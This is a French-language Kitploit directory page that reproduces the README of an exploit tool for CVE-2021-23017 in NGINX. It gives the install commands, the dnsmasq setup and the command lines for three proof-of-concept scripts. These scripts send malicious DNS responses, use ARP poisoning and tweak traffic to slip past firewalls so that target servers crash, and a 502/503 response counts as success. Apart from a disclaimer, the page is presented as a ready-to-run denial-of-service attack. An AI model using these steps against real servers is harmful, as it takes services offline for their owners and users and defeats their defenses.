Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
EVIL-CVE-2021-23017-Update-2025 — vulnérabilité dans les serveurs NGINX (versions 0.6.18–1.20.0). Les scripts visent à provoquer un déni de service (DoS) en envoyant des réponses DNS malveillantes, avec des améliorations pour contourner les pare-feux. | Kitploit
Outils/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionAnalyse DNS
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

vulnérabilité dans les serveurs NGINX (versions 0.6.18–1.20.0). Les scripts visent à provoquer un déni de service (DoS) en envoyant des réponses DNS malveillantes, avec des améliorations pour contourner les pare-feux.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

vulnérabilité dans les serveurs NGINX (versions 0.6.18–1.20.0). Les scripts visent à provoquer un déni de service (DoS) en envoyant des réponses DNS malveillantes, avec des améliorations pour contourner les pare-feux. Il s'agit d'une version améliorée du PoC original de M507/CVE-2021-23017-PoC.

Avertissement : Utilisez uniquement avec une autorisation écrite explicite du propriétaire du système. Les tests non autorisés sont illégaux.

Prérequis

  • Environnement : Linux (ex. Kali Linux, via Termux/configuration virtualisée).
  • Dépendances :
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • Réseau : Même sous-réseau que la cible pour l'empoisonnement ARP, ou le serveur NGINX cible doit utiliser l'adresse IP de votre serveur DNS.

Installation

  1. Clonez le dépôt :
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. Configurez dnsmasq :
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    Ajoutez : Démarrez :
root@kitploit:~
address=/test.example.com/192.168.1.100
root@kitploit:~
sudo systemctl start dnsmasq

Ce qu'il fait

  • Envoie des réponses DNS malveillantes avec un nom de domaine long (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) pour faire planter le serveur NGINX.
  • Déclenche des requêtes DNS en utilisant curl et dig pour exploiter la vulnérabilité.
  • Contourne les pare-feux en envoyant des paquets DNS directs et en utilisant des processus parallèles.

Différences par rapport à l'original

Comparé à M507/CVE-2021-23017-PoC :

  • Contournement de pare-feu amélioré : Utilise des processus parallèles dans poc1.2.3.py pour l'écoute simultanée, l'envoi DNS et le déclenchement de requêtes – vous devez exécuter les trois ensemble.
  • Livraison de paquets optimisée : Fréquence plus élevée de paquets et de requêtes pour contourner les filtres du pare-feu.
  • Vérification du sous-réseau : Vérifie la compatibilité réseau pour l'empoisonnement ARP, améliorant la fiabilité.

Utilisation

Exécutez les trois ensemble avec les arguments appropriés (remplacez <target_ip>, <your_dns_server_ip>, <target_url>).

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Écoute et répond aux requêtes DNS.

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Ajoute l'envoi direct de DNS et le déclenchement de requêtes.

poc3.py (Recommandé)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • Exécute les tâches en parallèle pour une efficacité maximale.

Exemple

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

Vérifier les résultats

  • Vérifiez l'état du serveur :

    root@kitploit:~
    curl -I http://<target_url>
    
    • Succès : 502 Bad Gateway ou 503 Service Unavailable indique un crash du serveur.
    • Échec : 200 OK suggère une absence de vulnérabilité ou un blocage par le pare-feu.
  • Surveillez le trafic DNS :

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

Avertissement : À des fins éducatives uniquement. Les auteurs ne sont pas responsables d'une mauvaise utilisation.

Télécharger l’outil